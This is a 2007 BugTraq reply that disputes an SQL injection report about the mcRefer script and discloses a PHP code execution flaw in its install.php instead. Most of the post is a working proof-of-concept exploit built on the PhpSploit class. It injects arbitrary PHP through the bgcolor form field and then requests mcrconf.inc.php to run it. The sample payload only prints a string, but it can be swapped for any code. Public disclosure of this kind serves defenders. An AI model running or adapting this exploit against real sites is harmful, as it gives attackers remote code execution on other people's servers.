BugTraq
Re: mcRefer SQL injection Feb 11 2007 11:26AM
gmdarkfig gmail com
This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----

#!/usr/bin/php
<?php
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig (at) gmail (dot) com [email concealed]
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7
D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url
=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus